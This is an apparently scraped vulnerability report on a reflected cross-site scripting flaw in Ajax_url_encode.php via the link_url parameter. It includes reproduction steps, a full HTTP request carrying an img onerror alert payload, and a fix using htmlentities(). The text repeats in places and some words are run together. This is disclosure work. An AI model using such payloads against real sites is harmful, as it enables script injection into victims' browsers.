Because of lacking of sanitizer of input data at $_REQUEST['link_url'] in Ajax_url_encode.php file, The Unauthenticated user can inject and execute javascript code on link_url parameter
Testing on local site:
Testing on demo site:
To Reproduce
XSS 1
Steps to reproduce the behavior:
Acess Ajax_url_encode.php file
Add ?link_url=[malicious script in here] behind Ajax_url_encode.php file
The backend will echo and execute malicious script
Request
GET /Ajax_url_encode.php?link_url=%3Cimg%20src=x%20onerror=alert(1);%3E HTTP/1.1
Host: 172.16.0.12:2222
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:90.0) Gecko/20100101 Firefox/90.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Cookie: PHPSESSID=mebdcag3g6jknfb8edrmee7ijp
Upgrade-Insecure-Requests: 1
Description:
Because of lacking of sanitizer of input data at

$_REQUEST['link_url']inAjax_url_encode.phpfile, The Unauthenticated user can inject and execute javascript code onlink_urlparameterTesting on local site:

Testing on demo site:

To Reproduce
XSS 1
Steps to reproduce the behavior:
Ajax_url_encode.phpfile?link_url=[malicious script in here]behindAjax_url_encode.phpfileRequest
Response
Solution:
use
htmlentities()function when echo the outputThe text was updated successfully, but these errors were encountered: